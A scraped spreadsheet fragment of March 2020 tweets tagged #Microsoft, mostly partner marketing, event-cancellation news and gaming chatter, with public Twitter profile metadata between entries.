    <t>{'id': 936135395888152576, 'id_str': '936135395888152576', 'name': 'Arkitectrl', 'screen_name': 'ArkitectrlPL', 'location': 'Sydney, New South Wales', 'description': 'Delivering low code solutions in the cloud for SMBs and Enterprises', 'url': 'https://t.co/q3Kw3Xrcvy', 'entities': {'url': {'urls': [{'url': 'https://t.co/q3Kw3Xrcvy', 'expanded_url': 'https://www.arkitectrl.io', 'display_url': 'arkitectrl.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 22, 'listed_count': 0, 'created_at': 'Thu Nov 30 07:30:45 +0000 2017', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 111,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'http://pbs.twimg.com/profile_images/1093662948893982720/-bWBIqgA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1093662948893982720/-bWBIqgA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/936135395888152576/1575244104',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</si>
  <si>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23:10:55 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #PowerBI enables Virgin Atlantic to create quick wins for internal #customerservice by unlocking the full potential of data. Learn more from CloudSolutionIT. #Microsoft https://t.co/PeAvBIyRsO</t>
  </si>
  <si>
    <t>Mon Mar 02 23:10:46 +0000 2020</t>
  </si>
  <si>
    <t>Discover Microsoft's 3-step approach to GDPR. With #Microsoft 365, Impulse Media Plus Design Pty Ltd helps customers achieve compliance and stay secure. https://t.co/p2b4XwMgjo</t>
  </si>
  <si>
    <t>Mon Mar 02 23:06:24 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "US Charges Two With Laundering $100M for North Korean Hackers:" https://t.co/MC7Fc89c85
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Mon Mar 02 23:05:40 +0000 2020</t>
  </si>
  <si>
    <t>@jenstirrup @BeginTry Thank you! Working for the community! #Microsoft365 #Microsoft #Azure</t>
  </si>
  <si>
    <t>{'id': 47724698, 'id_str': '47724698', 'name': 'Chesley Rocha', 'screen_name': 'chesleysilva', 'location': 'Planaltina, BrasÃ­lia', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 103, 'friends_count': 227, 'listed_count': 0, 'created_at': 'Tue Jun 16 19:49:32 +0000 2009', 'favourites_count': 305, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 912,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'http://pbs.twimg.com/profile_images/470396330557575168/7Sielmb-_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/470396330557575168/7Sielmb-_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47724698/1400986197',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</si>
  <si>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Mon Mar 02 23:03:30 +0000 2020</t>
  </si>
  <si>
    <t>90% of all garments end up in a landfill. @NatashaFranck, founder of EON, is using #IoT to put an end to the waste with RFID #tech and #Microsoft. What can you do with IoT? https://t.co/vvSUpyudOD</t>
  </si>
  <si>
    <t>{'id': 723846259, 'id_str': '723846259', 'name': 'Credexo', 'screen_name': 'Credexo', 'location': 'Houston, Texas', 'description': 'Credexo is a provider of Cloud ERP Solutions with a vertical focus on the needs of Manufacturing, Distribution &amp; Oil &amp; Gas industries.', 'url': 'https://t.co/x2YQ8acn8m', 'entities': {'url': {'urls': [{'url': 'https://t.co/x2YQ8acn8m', 'expanded_url': 'http://www.credexo.com', 'display_url': 'credexo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 59, 'listed_count': 1, 'created_at': 'Sun Jul 29 11:31:06 +0000 2012', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 209,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'http://pbs.twimg.com/profile_images/1158471094568935424/E5LVuiek_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158471094568935424/E5LVuiek_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/723846259/1518337906', 'profile_link_color': 'AE000C',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</si>
  <si>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23:03:21 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/lIxMc2pX5X</t>
  </si>
  <si>
    <t>Mon Mar 02 23:03:12 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/KEVjJj2Xiz</t>
  </si>
  <si>
    <t>Mon Mar 02 23:02:53 +0000 2020</t>
  </si>
  <si>
    <t>Get help putting the right technology in your school. Learn how #Microsoft devices enable better learning outcomes.    #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/HNNhWLs0vi</t>
  </si>
  <si>
    <t>Mon Mar 02 23:02:30 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft @AINowInstitute When #Microsoft #AI automatically labels an image of a black woman "a dog looking into the camera" @Microsoft - what should we call it? "data-driven #racism", "smart racism"?</t>
  </si>
  <si>
    <t>{'id': 1218989468931297286, 'id_str': '1218989468931297286', 'name': 'Algorithmic Governance: Research Network', 'screen_name': 'AlgorithmicGov1', 'location': 'Oslo', 'description': 'An interdisciplinary research network of scholars interested in algorithmic governance in relation to work, security, welfare, democracy and justice.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 34, 'friends_count': 59, 'listed_count': 2, 'created_at': 'Sun Jan 19 20:12:04 +0000 2020', 'favourites_count': 40, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 96, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218989591367225345/urxV-ir2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218989591367225345/urxV-ir2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1218989468931297286/1579465078',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</si>
  <si>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23:02:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft #Linux Conference #WSLConf is SOLD OUT for General Admission
 #Microsoft
https://t.co/gwWEKA9ZWt</t>
  </si>
  <si>
    <t>Mon Mar 02 23:02:15 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 83% of employees depend on technology to work together? The landscape of teamwork is changing--but we've got you covered. Check out this infographic to see how you can benefit from #Teamworksolutions from #Microsoft. https://t.co/BtWcIGRtXh</t>
  </si>
  <si>
    <t>{'id': 1179723025, 'id_str': '1179723025', 'name': 'American Technology', 'screen_name': 'AmericanTechS', 'location': '', 'description': 'Delivering value and helping customers achieve their business goals by proving full service technology solutions and services.', 'url': 'http://t.co/8o9GXOoZGm', 'entities': {'url': {'urls': [{'url': 'http://t.co/8o9GXOoZGm', 'expanded_url': 'http://www.americantechnology.com', 'display_url': 'americantechnology.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 246, 'listed_count': 8, 'created_at': 'Thu Feb 14 16:42:15 +0000 2013', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4140, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0F173C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/3253099636/3dab53977a57f027d0b5edf3bef757e3_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3253099636/3dab53977a57f027d0b5edf3bef757e3_normal.png', 'profile_link_color': '17235B', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '243790', 'profile_text_color': '1E2E76', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02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</si>
  <si>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https://t.co/8EcPAPHRhq</t>
  </si>
  <si>
    <t>Mon Mar 02 22:57:36 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news
https://t.co/0y0U1T6VXH
#Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Mon Mar 02 22:56:20 +0000 2020</t>
  </si>
  <si>
    <t>#Businessintelligence is crucial for making smart, data-driven decisions. #Microsoft's #PowerBI makes using your #BI easy and efficient. And it's award-winning! Contact our Power BI pro, Nick Cogliano (ncogliano@ccsglobaltech.com) to learn more 
https://t.co/AmSpsQxt1o</t>
  </si>
  <si>
    <t>{'id': 1261531028, 'id_str': '1261531028', 'name': 'ccsglobaltech', 'screen_name': 'ccs_globaltech', 'location': 'Poway, CA', 'description': 'CCS Global Tech is a top tier provider of #businessintelligence and #ITstaffing services headquartered in Poway, CA.', 'url': 'http://t.co/1nFkfBgHQH', 'entities': {'url': {'urls': [{'url': 'http://t.co/1nFkfBgHQH', 'expanded_url': 'http://www.ccsglobaltech.com/', 'display_url': 'ccsglobaltech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 70, 'listed_count': 3, 'created_at': 'Tue Mar 12 09:08:31 +0000 2013', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 278,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'http://pbs.twimg.com/profile_images/1228001854107328512/c6bI_yTP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228001854107328512/c6bI_yTP_normal.jpg',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</si>
  <si>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Mon Mar 02 22:56:19 +0000 2020</t>
  </si>
  <si>
    <t>The theme running through this years Analytics Summit will be Real-World Applications of Data Science and Business Analytics. #microsoft https://t.co/9a7oewYq8t https://t.co/xiHeynpKUC</t>
  </si>
  <si>
    <t>Mon Mar 02 22:54:59 +0000 2020</t>
  </si>
  <si>
    <t>@NickArcadeX Yup!! Master Chief for Smash Bros #microsoft #nintendo #dlc #SmashBrosUltimate https://t.co/QzCopjta8m</t>
  </si>
  <si>
    <t>{'id': 870654502956924929, 'id_str': '870654502956924929', 'name': 'Christopher Bonilla', 'screen_name': 'christopherbf1', 'location': 'Miami, FL', 'description': 'Writer and published Author of "Running Lips" &amp; "Lyrical Righteousness". I also like Jesus', 'url': 'https://t.co/O4JaGa3Vru', 'entities': {'url': {'urls': [{'url': 'https://t.co/O4JaGa3Vru', 'expanded_url': 'https://www.barnesandnoble.com/s/christopher+bonilla?_requestid=394466', 'display_url': 'barnesandnoble.com/s/christopher+â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 48, 'listed_count': 0, 'created_at': 'Fri Jun 02 14:53:04 +0000 2017', 'favourites_count': 164, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3297, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1087965498296492035/WKLEKzgR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1087965498296492035/WKLEKzgR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/870654502956924929/1496764213',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</si>
  <si>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22:54:40 +0000 2020</t>
  </si>
  <si>
    <t>$ESH One of the most undervalued and underloved stonks. Huge news coming out with a #Microsoft $MSFT Age of Empires partnership. https://t.co/JaW60ToZvG</t>
  </si>
  <si>
    <t>{'id': 1204731981734404097, 'id_str': '1204731981734404097', 'name': 'I Need Money', 'screen_name': 'ASXNeedMoney', 'location': 'Adelaide, South Australia', 'description': "'Make friends with the charts, its easier that way' Encouraging and Assisting All Millennials/GenZ In Investing.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 130, 'friends_count': 39, 'listed_count': 1, 'created_at': 'Wed Dec 11 11:57:50 +0000 2019', 'favourites_count': 474, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 394, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1204735247692091392/qZ1LnoCC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204735247692091392/qZ1LnoCC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1204731981734404097/1576066818',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</si>
  <si>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22:54:00 +0000 2020</t>
  </si>
  <si>
    <t>@EtienneDinfo @dgpblogster @jenkuntzGP @MVPAward VERY Surprised #Microsoft will do this remote - how will they control the #NDA aspect of the event.  Much harder to control when remote.</t>
  </si>
  <si>
    <t>{'id': 133602386, 'id_str': '133602386', 'name': 'David Gersten', 'screen_name': 'dsgersten', 'location': 'United States', 'description': '#MSDYN365BC #MSDYN365FO #MSDynGP #VFI #IAMCP @DynCon365 | US Board, dedicated dad &amp; loving husband #STEM #foodie #ERP #CRM #BizApps #CLOUD #MSPartner', 'url': 'https://t.co/wlb7Pgvz4c', 'entities': {'url': {'urls': [{'url': 'https://t.co/wlb7Pgvz4c', 'expanded_url': 'http://www.dynamicconsulting.com', 'display_url': 'dynamicconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2211, 'friends_count': 2392, 'listed_count': 162, 'created_at': 'Fri Apr 16 05:43:11 +0000 2010', 'favourites_count': 13879, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11689,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'http://pbs.twimg.com/profile_images/1228371575667216384/rnYZm61t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228371575667216384/rnYZm61t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/133602386/1570468775',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</si>
  <si>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22:53:58 +0000 2020</t>
  </si>
  <si>
    <t>@Immortal_Wake Nice list! #Microsoft #nintendo #capcom #pokemon #urshifu #heihachi This is mine #masterchief #smashbros https://t.co/BEFSAAlsXy</t>
  </si>
  <si>
    <t>Mon Mar 02 22:53:34 +0000 2020</t>
  </si>
  <si>
    <t>There is a new suite of high availability enhancements available in Windows Server 2019 Failover Clustering. Here are the top ten features from @SymonPerriman! #Microsoft #HyperV  https://t.co/kl3I7CfrqA</t>
  </si>
  <si>
    <t>Mon Mar 02 22:46:24 +0000 2020</t>
  </si>
  <si>
    <t>17 -Consultas de datos con T-SQL(SQL Server 2019)  UNION, UNION ALL
https://t.co/YoaIJnR9Rz
#sqlserver2019 #sql #microsoft  #SQL #sqlserver #tsql #examen #datos #tutorial #Union #UnionALL</t>
  </si>
  <si>
    <t>{'id': 1941554066, 'id_str': '1941554066', 'name': 'JOSE AHIAS LOPEZ POR', 'screen_name': 'portilloAhias', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 57, 'listed_count': 0, 'created_at': 'Sun Oct 06 17:26:43 +0000 2013', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1153470287960256515/g2GkBKfN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153470287960256515/g2GkBKfN_normal.jpg',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</si>
  <si>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22:46:16 +0000 2020</t>
  </si>
  <si>
    <t>@CoalitionGears Ya right!, all fixed just like it was last night as well! Unbelievable! How can #Microsoft let this company have gears! With such a mass exodus in population and revenue loss! @GearsofWar #XboxOne</t>
  </si>
  <si>
    <t>{'id': 327672071, 'id_str': '327672071', 'name': 'Buzzy', 'screen_name': 'buscobuzzy', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 8, 'listed_count': 2, 'created_at': 'Fri Jul 01 23:27:22 +0000 2011', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1600,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'http://pbs.twimg.com/profile_images/422207055647105025/1PyzmtqD_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/422207055647105025/1PyzmtqD_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/327672071/1362149544',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</si>
  <si>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22:44:40 +0000 2020</t>
  </si>
  <si>
    <t>I have received the Azure Community Hero 
#MSFTAdvocate #Microsoft #Cloud #Azure #AzureHero #AzureCommunityHero #Community #Meetups #Blockchain
https://t.co/fgJjb75sAF https://t.co/CwyIZWkTa8</t>
  </si>
  <si>
    <t>Mon Mar 02 22:41:59 +0000 2020</t>
  </si>
  <si>
    <t>The Benefits of a True Multi-Company Accounting Solution - Gravity Software https://t.co/7tct8hhUF0
#Restaurateurs #Operations #MsDynCRM #MsPartner #Microsoft #CRM #BusinessSolutions #CPAs #CFO #FamilyBiz #Businesses #JustSayGo #Cloud #AccountingSoftware https://t.co/6z0y78wdHu</t>
  </si>
  <si>
    <t>Mon Mar 02 22:41:20 +0000 2020</t>
  </si>
  <si>
    <t>Drones must be constantly connected to the internet to give Feds real-time location data  new US govt proposal https://t.co/1qbiVYtz62 via @Hybrid_Circle #VMware #Microsoft https://t.co/lTllh0hVxa</t>
  </si>
  <si>
    <t>Mon Mar 02 22:41:18 +0000 2020</t>
  </si>
  <si>
    <t>Expand Your Collection with New Special Edition Xbox Wireless Controllers https://t.co/nQsfzYIJje #microsoft #feedly</t>
  </si>
  <si>
    <t>{'id': 6167462, 'id_str': '6167462', 'name': 'Tadahiro Ishisaka', 'screen_name': 'ishisaka', 'location': 'é™å²¡çœŒ', 'description': 'Xbox Gamer tag: Ishisaka', 'url': 'http://t.co/iYPXTNPUlk', 'entities': {'url': {'urls': [{'url': 'http://t.co/iYPXTNPUlk', 'expanded_url': 'http://opcdiary.net/', 'display_url': 'opcdiary.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1759, 'friends_count': 1498, 'listed_count': 130, 'created_at': 'Sat May 19 22:14:25 +0000 2007', 'favourites_count': 11886, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 115839,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'http://pbs.twimg.com/profile_images/793221841653411840/gOettUfk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/793221841653411840/gOettUfk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/6167462/1398257683', 'profile_link_color': '0042B3',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</si>
  <si>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Mon Mar 02 22:40:04 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Microsoft MVP Summit Now A Virtual Conf Over Coronavirus Fears:" https://t.co/PfihJSHYaV
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Mon Mar 02 22:36:52 +0000 2020</t>
  </si>
  <si>
    <t>For those in the #robotic process automation #RPA space, Charles Lamanna shares an update of how #Microsoft will democratize automation for all organizations with attended &amp;amp; unattended RPA. #MSDyn365 #PowerAutomate #MSPartner https://t.co/1ASmALppVT</t>
  </si>
  <si>
    <t>{'id': 409505983, 'id_str': '409505983', 'name': 'Sheri Bettine', 'screen_name': 'SheriBettine', 'location': 'Snohomish, WA', 'description': 'Beekeeper, Gardener, Boater, Data Scientist, Data and AI Evangelist at Microsoft #WomenInTech #WomenInSTEM #TechForGood #TheFutureIsBright', 'url': 'http://t.co/pEcMOwB3mS', 'entities': {'url': {'urls': [{'url': 'http://t.co/pEcMOwB3mS', 'expanded_url': 'http://www.sheribettine.com', 'display_url': 'sheribettine.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 225, 'friends_count': 345, 'listed_count': 13, 'created_at': 'Thu Nov 10 20:55:33 +0000 2011', 'favourites_count': 1558, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1426, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFCC4D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1039957175148392448/sgyaQkkj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1039957175148392448/sgyaQkkj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/409505983/1537210658', 'profile_link_color': 'ABB8C2',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</si>
  <si>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22:34:52 +0000 2020</t>
  </si>
  <si>
    <t>It's so sad, that  #mvp #summit in #Seattle has been "relocated" because of #CoronaOutbreak. #microsoft is surely doing its best, holding it online. So, thx @MVPAward @MVPBuzz @Microsoft for the opportunity, although it's difficult these days.</t>
  </si>
  <si>
    <t>Mon Mar 02 22:32:19 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Power Automate to add UI flows in April with two pricing options
#microsoft #automate #tools #process #webshoutz
add your website to 200+ listing &amp;amp; Make sure your business shows up when it counts with the best listing directories
https://t.co/1Jn4lFkwTl https://t.co/crIMJZsb4l</t>
  </si>
  <si>
    <t>Mon Mar 02 22:31:43 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft cancels MVP Summit in Seattle area due to #coronavirus outbreak https://t.co/ZB6NqVgwxF #health</t>
  </si>
  <si>
    <t>Mon Mar 02 22:30:11 +0000 2020</t>
  </si>
  <si>
    <t>Blue Cedar and #Microsoft enable Intune users to connect from managed mobile apps to #data sources https://t.co/vM35Tp1X2h #HelpNetSecurity</t>
  </si>
  <si>
    <t>Mon Mar 02 22:30:06 +0000 2020</t>
  </si>
  <si>
    <t>Lots of hype for the new Microsoft Duo. The Surface has been an excellent device, lets hope this follows suit.
#Microsoft #MicrosoftDuo #MSFT #Tablet #Fablet
https://t.co/xIymGJRnOp</t>
  </si>
  <si>
    <t>Mon Mar 02 22:29:22 +0000 2020</t>
  </si>
  <si>
    <t>SoftwareReviews recently released a list of the most satisfying big data software vendors, based on user reviews, and #Amazon Web Services Big Data, #IBM InfoSphere, and #Microsoft #Azure Big Data topped the list. 
https://t.co/9Oe1c9Em6x 
#CDNtech #software #reviews</t>
  </si>
  <si>
    <t>Mon Mar 02 22:23:30 +0000 2020</t>
  </si>
  <si>
    <t>$AMZN
Cup and handle- FAKE or REAL?
#microsoft
#amazon
#google
#apple https://t.co/SyMLdGDaOD</t>
  </si>
  <si>
    <t>{'id': 1218295990890958848, 'id_str': '1218295990890958848', 'name': 'STEEZ', 'screen_name': 'DegenerateSTEEZ', 'location': "Your Mom's House", 'description': 'ðŸ’° Top Ranked Leveraged Trader on Bitmex\nðŸ“š PhD in E. Waves &amp; Masters in Fibonacci\nðŸŽ¯ Daily Tecnhical Analysis &amp; Charts\nâ¬‡ï¸ FREE CALLS, BUT I ACCEPT DONATIONS â¬‡ï¸', 'url': 'https://t.co/aPa7e9hN1n', 'entities': {'url': {'urls': [{'url': 'https://t.co/aPa7e9hN1n', 'expanded_url': 'http://cash.app/$ThirdEye47', 'display_url': 'cash.app/$ThirdEye47', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 288, 'friends_count': 58, 'listed_count': 3, 'created_at': 'Fri Jan 17 22:16:39 +0000 2020', 'favourites_count': 1003, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2314, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218297989032181761/qK2dzhf0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218297989032181761/qK2dzhf0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1218295990890958848/1580386895',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</si>
  <si>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22:19:44 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">I just got informed that my #Microsoft event in #Redmond was cancelled because of the #Corona virus. 
Thanks @Delta for the easy refund of my ticket!! 
I will definitely remain a loyal customer!!
</t>
  </si>
  <si>
    <t>{'id': 997835062602358784, 'id_str': '997835062602358784', 'name': 'Drago Petrovic [MVP]', 'screen_name': '_DragoPetrovic', 'location': 'Zurich, Switzerland', 'description': 'Swiss Microsoft MVP and Speaker for #MSExchange and #Office365. Principal System Engineer at @ITpointAG, Blog at @_MSB365 and IT teacher at @Klubschule', 'url': 'https://t.co/fiieN99940', 'entities': {'url': {'urls': [{'url': 'https://t.co/fiieN99940', 'expanded_url': 'https://www.msb365.blog', 'display_url': 'msb365.blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 149, 'friends_count': 287, 'listed_count': 2, 'created_at': 'Sat May 19 13:43:12 +0000 2018', 'favourites_count': 944, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 645, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1198744175166074881/OXz90H1r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198744175166074881/OXz90H1r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/997835062602358784/1526737873',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</si>
  <si>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22:18:58 +0000 2020</t>
  </si>
  <si>
    <t>Has your company outgrown its accounting software? Here are five tell-tale signs to watch out for, and how to grow beyond the limits. Get the infographic.     #Microsoft #Technology #IT #BusinessAutomation #accounting #MSDyn365 https://t.co/1SfyQWJH5k</t>
  </si>
  <si>
    <t>Mon Mar 02 22:18:51 +0000 2020</t>
  </si>
  <si>
    <t>Where does your company rank when it comes to #workplacesatisfaction? Learn what really makes employees happy. More, via @:ChannelE2E   #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/J5MWQMTwHK</t>
  </si>
  <si>
    <t>{'id': 461167928, 'id_str': '461167928', 'name': 'Virtace', 'screen_name': 'VirtaceInc', 'location': 'Toronto', 'description': "Virtace's enables our clients to 'work different' both in the field and office. #infieldclipboard #inofficetek #FSM", 'url': 'https://t.co/u07D9T2KEv', 'entities': {'url': {'urls': [{'url': 'https://t.co/u07D9T2KEv', 'expanded_url': 'http://virtace.com', 'display_url': 'virtace.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 112, 'friends_count': 220, 'listed_count': 2, 'created_at': 'Wed Jan 11 14:36:25 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 751,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'http://pbs.twimg.com/profile_images/2907357128/74cce1fe63c118227f0053a3e4a8e163_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2907357128/74cce1fe63c118227f0053a3e4a8e163_normal.png', 'profile_link_color': 'FAB81E',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</si>
  <si>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Where does your company rank when it comes to #workplacesatisfaction? Learn what really makes employees happy. More, via @:ChannelE2E   #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/3xjAoGizAZ</t>
  </si>
  <si>
    <t>{'id': 251298513, 'id_str': '251298513', 'name': 'Bren Sambunathan', 'screen_name': 'pbrens', 'location': 'Toronto, Canada', 'description': 'The secret of change is to focus all of your energy, not on fighting the old, but on building the new -Socrates ...building the next...', 'url': 'https://t.co/1ld7lMx4iR', 'entities': {'url': {'urls': [{'url': 'https://t.co/1ld7lMx4iR', 'expanded_url': 'http://www.virtace.com', 'display_url': 'virtace.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 348, 'friends_count': 693, 'listed_count': 13, 'created_at': 'Sat Feb 12 21:14:52 +0000 2011', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 836,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'http://pbs.twimg.com/profile_images/1167285379134832640/IHEyRzBT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1167285379134832640/IHEyRzBT_normal.jpg',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</si>
  <si>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22:17:58 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/layNEnpUgV</t>
  </si>
  <si>
    <t>Mon Mar 02 22:17:57 +0000 2020</t>
  </si>
  <si>
    <t>Hendrick Motorsports drives faster NASCAR performance with high-speed communication using #Microsoft #Teams. Watch the video to learn how. https://t.co/D9Y8WWRanU</t>
  </si>
  <si>
    <t>Mon Mar 02 22:17:45 +0000 2020</t>
  </si>
  <si>
    <t>How can you benefit from #Microsoft field service solutions? Check out this customer success story video for inspiration. https://t.co/kJQVmN8ikf</t>
  </si>
  <si>
    <t>Mon Mar 02 22:17:26 +0000 2020</t>
  </si>
  <si>
